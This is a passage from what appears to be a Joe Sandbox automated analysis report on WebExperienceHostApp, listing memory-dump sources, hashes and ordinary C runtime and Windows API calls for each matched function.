                                                                    • Source File: 00000006.00000002.1882879507.00007FFE00281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE00280000, based on PE: true
                                                                    • Associated: 00000006.00000002.1882800819.00007FFE00280000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883140160.00007FFE002D5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883230027.00007FFE00303000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883253227.00007FFE00307000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_7ffe00280000_WebExperienceHostApp.jbxd
                                                                    Similarity
                                                                    • API ID: FileFindNext$wcscpy_s
                                                                    • String ID: .
                                                                    • API String ID: 544952861-248832578
                                                                    • Opcode ID: e8055660fd5f3a0e6e4367fb8295474a2c920e569d81a9d24aaffc670c06c300
                                                                    • Instruction ID: bb05dce90fcbd430840b574a5beb877e5fdac71f80ff054c4d8df464a0110f09
                                                                    • Opcode Fuzzy Hash: e8055660fd5f3a0e6e4367fb8295474a2c920e569d81a9d24aaffc670c06c300
                                                                    • Instruction Fuzzy Hash: 5921A126A0D68381FE70CB55E8483B927A0EBC8784F444132DB8D43BAADFBCD4498B01
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.1882879507.00007FFE00281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE00280000, based on PE: true
                                                                    • Associated: 00000006.00000002.1882800819.00007FFE00280000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883140160.00007FFE002D5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883230027.00007FFE00303000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883253227.00007FFE00307000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_7ffe00280000_WebExperienceHostApp.jbxd
                                                                    Similarity
                                                                    • API ID: ExceptionThrow$std::ios_base::failure::failure
                                                                    • String ID: ios_base::badbit set
                                                                    • API String ID: 1099746521-3882152299
                                                                    • Opcode ID: a934e826d32ede37d3e5b424d5656a2318ae423a750d11c43174206a3af171af
                                                                    • Instruction ID: 15b10edcf7f22f12b5e0400d448aa8e955e3eb8cf58c50a9538c529edba8d51d
                                                                    • Opcode Fuzzy Hash: a934e826d32ede37d3e5b424d5656a2318ae423a750d11c43174206a3af171af
                                                                    • Instruction Fuzzy Hash: FC01F26AE2A60791F618C655D44D5B91A52EFC0348F548036DB8E0ABBFEE3CEA068340
                                                                    APIs
                                                                    • abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,00007FFE0029328D,?,?,?,00007FFE00292D03), ref: 00007FFE002932D3
                                                                    • InitializeCriticalSectionEx.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,00007FFE0029328D,?,?,?,00007FFE00292D03), ref: 00007FFE002932F1
                                                                    • InitializeSRWLock.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,00007FFE0029328D,?,?,?,00007FFE00292D03), ref: 00007FFE00293308
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.1882879507.00007FFE00281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE00280000, based on PE: true
                                                                    • Associated: 00000006.00000002.1882800819.00007FFE00280000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883140160.00007FFE002D5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883230027.00007FFE00303000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883253227.00007FFE00307000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_7ffe00280000_WebExperienceHostApp.jbxd
                                                                    Similarity
                                                                    • API ID: Initialize$CriticalLockSectionabort
                                                                    • String ID: p/)
                                                                    • API String ID: 2361494507-4213051715
                                                                    • Opcode ID: 3ed5763ba69d27d0247f70d39b1130e6a6c23cb5fde608632177a057e24d302c
                                                                    • Instruction ID: 263dcec182722ee020c0e87f6b0718cab46ce4537ec042fb66dd30767060f723
                                                                    • Opcode Fuzzy Hash: 3ed5763ba69d27d0247f70d39b1130e6a6c23cb5fde608632177a057e24d302c
                                                                    • Instruction Fuzzy Hash: 10017C32A08A0382EB58CF24E49413827A4EF84B14F544035CB5D427BDDF38D984C700
                                                                    APIs
                                                                      • Part of subcall function 00007FFE13306770: abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00007FFE133023AE), ref: 00007FFE1330677E
                                                                    • terminate.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFE1330244E
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.1883312675.00007FFE13301000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFE13300000, based on PE: true
                                                                    • Associated: 00000006.00000002.1883278501.00007FFE13300000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883340934.00007FFE13311000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883363676.00007FFE13316000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883384636.00007FFE13317000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_7ffe13300000_WebExperienceHostApp.jbxd
                                                                    Similarity
                                                                    • API ID: abortterminate
                                                                    • String ID: MOC$RCC$csm
                                                                    • API String ID: 661698970-2671469338
                                                                    • Opcode ID: 47db328f9ad3fe6785f7c33411a4be44342857283f86d96f95ada9c86e643c8e
                                                                    • Instruction ID: 1a62587fa990faae7228aaa03d74a826674328f8ccbfdd8a81075a6413df69d7
                                                                    • Opcode Fuzzy Hash: 47db328f9ad3fe6785f7c33411a4be44342857283f86d96f95ada9c86e643c8e
                                                                    • Instruction Fuzzy Hash: 36F04F36918A06C9E7505F22E18506D37B4EB58B64F1950B1D76C56276CF3CD8A0CB45
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.1882624863.00007FF60BD71000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF60BD70000, based on PE: true
                                                                    • Associated: 00000006.00000002.1882563067.00007FF60BD70000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1882667394.00007FF60BD7A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1882704903.00007FF60BD7E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1882737371.00007FF60BD7F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_7ff60bd70000_WebExperienceHostApp.jbxd
                                                                    Similarity
                                                                    • API ID: AddressHandleModuleProc
                                                                    • String ID: RaiseFailFastException$kernelbase.dll
                                                                    • API String ID: 1646373207-919018592
                                                                    • Opcode ID: 9cee964bd7aab848cc37a03405ac079c2a0f27fdeb4b8e053aa243852f3d0080
                                                                    • Instruction ID: 8d5b0dec228fbb7aca612e8ed57fd7a54a3e25281a016968aae68162be5b525e
                                                                    • Opcode Fuzzy Hash: 9cee964bd7aab848cc37a03405ac079c2a0f27fdeb4b8e053aa243852f3d0080
                                                                    • Instruction Fuzzy Hash: 0EF01225B6865181EA184F03F844469A761BF4CFC0B549135DD5EC7BB8EE6CD4418700
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.1883312675.00007FFE13301000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFE13300000, based on PE: true
                                                                    • Associated: 00000006.00000002.1883278501.00007FFE13300000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883340934.00007FFE13311000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883363676.00007FFE13316000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883384636.00007FFE13317000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_7ffe13300000_WebExperienceHostApp.jbxd
                                                                    Similarity
                                                                    • API ID: Name::operator+
                                                                    • String ID:
                                                                    • API String ID: 2943138195-0
                                                                    • Opcode ID: e0e856a0689efcaa77ef655b2ee01dfdabc08d004ac59cec928a27a07a1ba9ac
                                                                    • Instruction ID: 8b26a34cbffdea8496e5ecdc051bd7b64d851212d12e584227851c83679527c7
                                                                    • Opcode Fuzzy Hash: e0e856a0689efcaa77ef655b2ee01dfdabc08d004ac59cec928a27a07a1ba9ac
                                                                    • Instruction Fuzzy Hash: BC916B62E08E528DFB108BA6D8403AC37B1BB64728F5480B5DE6D376B5DF7CA845C348
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.1883312675.00007FFE13301000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFE13300000, based on PE: true
                                                                    • Associated: 00000006.00000002.1883278501.00007FFE13300000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883340934.00007FFE13311000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883363676.00007FFE13316000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883384636.00007FFE13317000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_7ffe13300000_WebExperienceHostApp.jbxd
                                                                    Similarity
                                                                    • API ID: Name::operator+$NameName::
                                                                    • String ID:
                                                                    • API String ID: 168861036-0
                                                                    • Opcode ID: db26575aafbf47d1ebfcb41f0a44ab5eea3fe5a11d01272e410fccac97833c0a
                                                                    • Instruction ID: ef4013f16916ace7cdbd8f50c74d06b0570abfd9932cff45fe3b17469827bb13
                                                                    • Opcode Fuzzy Hash: db26575aafbf47d1ebfcb41f0a44ab5eea3fe5a11d01272e410fccac97833c0a
                                                                    • Instruction Fuzzy Hash: 5A517D72A18E518DF7118F66E84037C37A1AB68764F5441B5DA2D277B5DF3DD441C308
                                                                    APIs
                                                                    • memcpy.VCRUNTIME140_APP(?,?,?,7FFFFFFFFFFFFFFE,?,?,?,?,?,?,00000000,00000000,0000003F,00000000,00000048,00007FFE00296EF1), ref: 00007FFE002975D7
                                                                    • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,7FFFFFFFFFFFFFFE,?,?,?,?,?,?,00000000,00000000,0000003F,00000000,00000048,00007FFE00296EF1), ref: 00007FFE0029762B
                                                                    • memcpy.VCRUNTIME140_APP(?,?,?,7FFFFFFFFFFFFFFE,?,?,?,?,?,?,00000000,00000000,0000003F,00000000,00000048,00007FFE00296EF1), ref: 00007FFE00297635
                                                                    • Concurrency::cancel_current_task.LIBCPMT ref: 00007FFE00297679
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.1882879507.00007FFE00281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE00280000, based on PE: true
                                                                    • Associated: 00000006.00000002.1882800819.00007FFE00280000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883140160.00007FFE002D5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883230027.00007FFE00303000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883253227.00007FFE00307000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_7ffe00280000_WebExperienceHostApp.jbxd
                                                                    Similarity
                                                                    • API ID: memcpy$Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturn
                                                                    • String ID:
                                                                    • API String ID: 1775671525-0
                                                                    • Opcode ID: 6a3fb9a081d1040bcb31cb8976ecef3be5baf333ccd0691446595d407ef7610f
                                                                    • Instruction ID: 88864c5b41ec9eb39d0b2a0e52d42a8a6605d054483c043defbc9a89293c10b0
                                                                    • Opcode Fuzzy Hash: 6a3fb9a081d1040bcb31cb8976ecef3be5baf333ccd0691446595d407ef7610f
                                                                    • Instruction Fuzzy Hash: CB410061B18A5391ED08DB16E1042796B55EB84BE0F544A31EF6C07BEEEE3CE042C300
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.1882879507.00007FFE00281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE00280000, based on PE: true
                                                                    • Associated: 00000006.00000002.1882800819.00007FFE00280000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883140160.00007FFE002D5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883230027.00007FFE00303000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883253227.00007FFE00307000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_7ffe00280000_WebExperienceHostApp.jbxd
                                                                    Similarity
                                                                    • API ID: Xp_movx$Xp_setw_errnoldexpmemcpy
                                                                    • String ID:
                                                                    • API String ID: 2233944734-0
                                                                    • Opcode ID: 5f6e89d24b1cfb7bdbc1a0da2f84e74a13c0c09dfe02f17bd2c73ce5df9fcb8a
                                                                    • Instruction ID: 034a3945021d007b213d67bcdb51423920e45c85461dbdc63ce656a9ef047710
                                                                    • Opcode Fuzzy Hash: 5f6e89d24b1cfb7bdbc1a0da2f84e74a13c0c09dfe02f17bd2c73ce5df9fcb8a
                                                                    • Instruction Fuzzy Hash: 3F41BA22A1CA4786F7129B2690812BB67A4BFC8740F544631EF8D137BFDF3CE9468640
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.1882879507.00007FFE00281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE00280000, based on PE: true
                                                                    • Associated: 00000006.00000002.1882800819.00007FFE00280000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883140160.00007FFE002D5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883230027.00007FFE00303000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883253227.00007FFE00307000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_7ffe00280000_WebExperienceHostApp.jbxd
                                                                    Similarity
                                                                    • API ID: ___lc_codepage_func___lc_locale_name_func__pctype_funcislower
                                                                    • String ID:
                                                                    • API String ID: 2234106055-0
                                                                    • Opcode ID: ba68687bd1084c1fd20868618680cfa2efd6f955821d8f547e74609adf00972e
                                                                    • Instruction ID: e5ded78f84b1915a172f3e98507cc366a169906368fb3d972b9d791f07605ba9
                                                                    • Opcode Fuzzy Hash: ba68687bd1084c1fd20868618680cfa2efd6f955821d8f547e74609adf00972e
                                                                    • Instruction Fuzzy Hash: 1531BE26A0DB4282F711CB56A85427D6EA1EBC0F91F184035DB8E07BAEDF3CE585C710
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.1882879507.00007FFE00281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE00280000, based on PE: true
                                                                    • Associated: 00000006.00000002.1882800819.00007FFE00280000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883140160.00007FFE002D5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883230027.00007FFE00303000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883253227.00007FFE00307000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_7ffe00280000_WebExperienceHostApp.jbxd
                                                                    Similarity
                                                                    • API ID: ___lc_codepage_func___lc_locale_name_func__pctype_funcisupper
                                                                    • String ID:
                                                                    • API String ID: 3857474680-0
                                                                    • Opcode ID: 23ab1e88ae2b3b9f22ff4d2e2df039963f5cd33ef94b97e970288bced12dc4c5
                                                                    • Instruction ID: 649e6b726b9d947cdbede4bf451bc22238628cef6acd5ae6af2e46d9252fe190
                                                                    • Opcode Fuzzy Hash: 23ab1e88ae2b3b9f22ff4d2e2df039963f5cd33ef94b97e970288bced12dc4c5
                                                                    • Instruction Fuzzy Hash: 0C31BF66A0DB4282F715CB55A85037D6EA1EBD0B91F184035DB8A07BAEDE6CE684C710
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.1883312675.00007FFE13301000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFE13300000, based on PE: true
                                                                    • Associated: 00000006.00000002.1883278501.00007FFE13300000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883340934.00007FFE13311000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883363676.00007FFE13316000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883384636.00007FFE13317000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_7ffe13300000_WebExperienceHostApp.jbxd
                                                                    Similarity
                                                                    • API ID: Name::operator+$Replicator::operator[]
                                                                    • String ID:
                                                                    • API String ID: 3863519203-0
                                                                    • Opcode ID: 137f35b8ab8777edeeea4d3d93e268a54653f94e00eb99c599d23a709cf02532
                                                                    • Instruction ID: da32a695306d6819a440588cb9611b8f6f4410100612de2e8bf8c04657be20ca
                                                                    • Opcode Fuzzy Hash: 137f35b8ab8777edeeea4d3d93e268a54653f94e00eb99c599d23a709cf02532
                                                                    • Instruction Fuzzy Hash: 6F418572A08B458EEB01CF66D8403AC37B0FB68B68F588165DA5D6B76ADF3C9440C304
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.1882879507.00007FFE00281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE00280000, based on PE: true
                                                                    • Associated: 00000006.00000002.1882800819.00007FFE00280000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883140160.00007FFE002D5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883230027.00007FFE00303000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883253227.00007FFE00307000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_7ffe00280000_WebExperienceHostApp.jbxd
                                                                    Similarity
                                                                    • API ID: Handle$CloseFileInformation$CreateFile2
                                                                    • String ID:
                                                                    • API String ID: 1163284826-0
                                                                    • Opcode ID: c98a8f08e21ed10e916e511ab44b33d144b6336d3769b1fd7808e17c69bf46a3
                                                                    • Instruction ID: bc380ea112e8c10b347648e467dc60469703656e4a98185c7b760ff31fb15fbe
                                                                    • Opcode Fuzzy Hash: c98a8f08e21ed10e916e511ab44b33d144b6336d3769b1fd7808e17c69bf46a3
                                                                    • Instruction Fuzzy Hash: 5C31D422B05A1785F710CBB5D4407BE2BB0AB94BA8F444736DE2D177EADE38D8858340
                                                                    APIs
                                                                    • ___lc_locale_name_func.API-MS-WIN-CRT-LOCALE-L1-1-0(?,00000000,?,?,?,00007FFE002AF441), ref: 00007FFE002BBA07
                                                                    • memcpy.VCRUNTIME140_APP(?,00000000,?,?,?,00007FFE002AF441), ref: 00007FFE002BBA2B
                                                                    • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,00000000,?,?,?,00007FFE002AF441), ref: 00007FFE002BBA38
                                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,00000000,?,?,?,00007FFE002AF441), ref: 00007FFE002BBAAB
                                                                      • Part of subcall function 00007FFE00282E70: wcsnlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FFE00282E9A
                                                                      • Part of subcall function 00007FFE00282E70: LCMapStringEx.API-MS-WIN-CORE-LOCALIZATION-L1-2-0 ref: 00007FFE00282EDE
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.1882879507.00007FFE00281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE00280000, based on PE: true
                                                                    • Associated: 00000006.00000002.1882800819.00007FFE00280000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883140160.00007FFE002D5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883230027.00007FFE00303000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883253227.00007FFE00307000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_7ffe00280000_WebExperienceHostApp.jbxd
                                                                    Similarity
                                                                    • API ID: String___lc_locale_name_funcfreemallocmemcpywcsnlen
                                                                    • String ID:
                                                                    • API String ID: 2888714520-0
                                                                    • Opcode ID: f175193b6c3cb69a186ef12907c31e75d148df82e888f905f451e463fc05ba55
                                                                    • Instruction ID: d248bf9d123ec39de7f0176e7033d419f15bb1f77fc69915246d03d35f41fd45
                                                                    • Opcode Fuzzy Hash: f175193b6c3cb69a186ef12907c31e75d148df82e888f905f451e463fc05ba55
                                                                    • Instruction Fuzzy Hash: BA21E621B19A9385E6219F12A40052AAFD8FBC5FE4F584231DFA9177FADF7CE4418300
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.1882879507.00007FFE00281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE00280000, based on PE: true
                                                                    • Associated: 00000006.00000002.1882800819.00007FFE00280000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883140160.00007FFE002D5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883230027.00007FFE00303000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883253227.00007FFE00307000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_7ffe00280000_WebExperienceHostApp.jbxd
                                                                    Similarity
                                                                    • API ID: _fsopen$fclosefseek
                                                                    • String ID:
                                                                    • API String ID: 410343947-0
                                                                    • Opcode ID: f64390f3235c326aca300763c1886b7c3d144e41e05b7a6f6191a3c4a7674b13
                                                                    • Instruction ID: 1a04e70974d3d1e4386ebe51a870adb1d110ed8c4b4043597a4566de3024ee02
                                                                    • Opcode Fuzzy Hash: f64390f3235c326aca300763c1886b7c3d144e41e05b7a6f6191a3c4a7674b13
                                                                    • Instruction Fuzzy Hash: 4E21A229B1E61241FB69C756A4547356A91BFC8B44F495136CF8E43BA9DE3CE8418700
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.1882879507.00007FFE00281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE00280000, based on PE: true
                                                                    • Associated: 00000006.00000002.1882800819.00007FFE00280000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883140160.00007FFE002D5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883230027.00007FFE00303000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883253227.00007FFE00307000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_7ffe00280000_WebExperienceHostApp.jbxd
                                                                    Similarity
                                                                    • API ID: _wfsopen$fclosefseek
                                                                    • String ID:
                                                                    • API String ID: 1261181034-0
                                                                    • Opcode ID: 4b2da362127e04f405fab03e2eb1a3b31cc41c713e6c08ffbf6b669a431fb480
                                                                    • Instruction ID: c3262e7238b610199df63fe6e30b1e44363151944634ca9084bfd84c6a2d6d6d
                                                                    • Opcode Fuzzy Hash: 4b2da362127e04f405fab03e2eb1a3b31cc41c713e6c08ffbf6b669a431fb480
                                                                    • Instruction Fuzzy Hash: EE21C225B1A61345FB69CB46A5517266AE2BFC4B44F485135CF4E43BA9DE3CE801C300
                                                                    APIs
                                                                      • Part of subcall function 00007FFE002928BC: FormatMessageA.API-MS-WIN-CORE-LOCALIZATION-L1-2-0 ref: 00007FFE002928E2
                                                                    • memcpy.VCRUNTIME140_APP ref: 00007FFE002B90D9
                                                                      • Part of subcall function 00007FFE00283474: memcpy.VCRUNTIME140_APP(?,?,?,00007FFE00286B5F,?,?,?,00007FFE002847EC), ref: 00007FFE00283516
                                                                    • memcpy.VCRUNTIME140_APP ref: 00007FFE002B9115
                                                                    • LocalFree.API-MS-WIN-CORE-HEAP-L2-1-0 ref: 00007FFE002B913B
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.1882879507.00007FFE00281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE00280000, based on PE: true
                                                                    • Associated: 00000006.00000002.1882800819.00007FFE00280000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883140160.00007FFE002D5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883230027.00007FFE00303000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883253227.00007FFE00307000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_7ffe00280000_WebExperienceHostApp.jbxd
                                                                    Similarity
                                                                    • API ID: memcpy$FormatFreeLocalMessage
                                                                    • String ID: unknown error
                                                                    • API String ID: 1603595190-3078798498
                                                                    • Opcode ID: 393403b6a1f1d4d4069c48657dc765f8cbe8dc40f65fc9da209a8faca06826de
                                                                    • Instruction ID: d0a3a79099e9f8a7152950a9938e4a2738d819fad7fdc316330308c66554e81e
                                                                    • Opcode Fuzzy Hash: 393403b6a1f1d4d4069c48657dc765f8cbe8dc40f65fc9da209a8faca06826de
                                                                    • Instruction Fuzzy Hash: B1216B32A08B9285EB149F2AE50522D7BA5EB85FD4F088035DB8D0776ECF3CE591C781
                                                                    APIs
                                                                    • ___lc_locale_name_func.API-MS-WIN-CRT-LOCALE-L1-1-0(?,?,?,?,?,?,00000000,00007FFE002B612B), ref: 00007FFE002BB094
                                                                    • ___lc_collate_cp_func.API-MS-WIN-CRT-LOCALE-L1-1-0(?,?,?,?,?,?,00000000,00007FFE002B612B), ref: 00007FFE002BB09E
                                                                      • Part of subcall function 00007FFE00282740: __strncnt.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FFE00282786
                                                                      • Part of subcall function 00007FFE00282740: __strncnt.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FFE002827AB
                                                                      • Part of subcall function 00007FFE00282740: GetCPInfo.API-MS-WIN-CORE-LOCALIZATION-L1-2-0 ref: 00007FFE002827EB
                                                                    • memcmp.VCRUNTIME140_APP(?,?,?,?,?,?,00000000,00007FFE002B612B), ref: 00007FFE002BB0C1
                                                                    • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,00000000,00007FFE002B612B), ref: 00007FFE002BB0FF
                                                                    Memory Dump Source
                                                                    • Source File: 00000006.00000002.1882879507.00007FFE00281000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFE00280000, based on PE: true
                                                                    • Associated: 00000006.00000002.1882800819.00007FFE00280000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883140160.00007FFE002D5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883230027.00007FFE00303000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000006.00000002.1883253227.00007FFE00307000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_6_2_7ffe00280000_WebExperienceHostApp.jbxd
                                                                    Similarity
                                                                    • API ID: __strncnt$Info___lc_collate_cp_func___lc_locale_name_func_errnomemcmp
                                                                    • String ID:
                                                                    • API String ID: 3421985146-0
                                                                    • Opcode ID: 9a4f074f7fe3bee5cb6c30750c332483e251a416c8866ebaadee7a14ac30e426
                                                                    • Instruction ID: 5a77198a770023705431c0891301c000757a02bc5ac6290057bc2a35b0883775
                                                                    • Opcode Fuzzy Hash: 9a4f074f7fe3bee5cb6c30750c332483e251a416c8866ebaadee7a14ac30e426
                                                                    • Instruction Fuzzy Hash: 08215031A18B5286EB118F1AD44002DAAE4FBC8FD4F544135DF5D577AACF7CE8418700
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
